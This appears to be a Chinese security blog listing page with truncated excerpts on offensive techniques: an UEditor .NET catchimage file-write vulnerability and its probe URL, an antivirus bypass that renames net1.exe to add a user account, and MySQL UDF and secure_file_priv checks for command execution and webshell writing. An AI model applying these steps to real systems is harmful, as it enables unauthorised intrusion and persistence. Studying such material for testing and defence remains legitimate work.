摘要：···漏洞原理 在抓取远程数据源的时候未对文件后缀名做验证导致任意文件写入漏洞 ··· 访问/uedit/net/controller.ashx?action=catchimage 若存在抓取源报错，则存在漏洞 本地构造上传文件 <form action="http://xxx.xxx.xxx.xx 阅读全文

摘要：火绒对添加用户操作拦截 bypass copy c:\windows\system32\net1.exe aaa.txt aaa.txt user xxx 123456 /add 阅读全文

摘要：UDF (user defined function)，即用户自定义函数。是通过添加新函数，对MySQL的功能进行扩充。原理是添加一个能执行系统命令的函数。 前提 secure_file_priv为空，支持导入导出 show global variables like 'secure%'; 一、导入 阅读全文

摘要：方式一： 条件： 对web目录有写权限 GPC关闭（能使用单引号） 有绝对路径（读文件可以不用，写文件必须） 没有配置 –secure-file-priv（secure-file-priv=空） show global variables like '%secure%'; ##查看secure-fi 阅读全文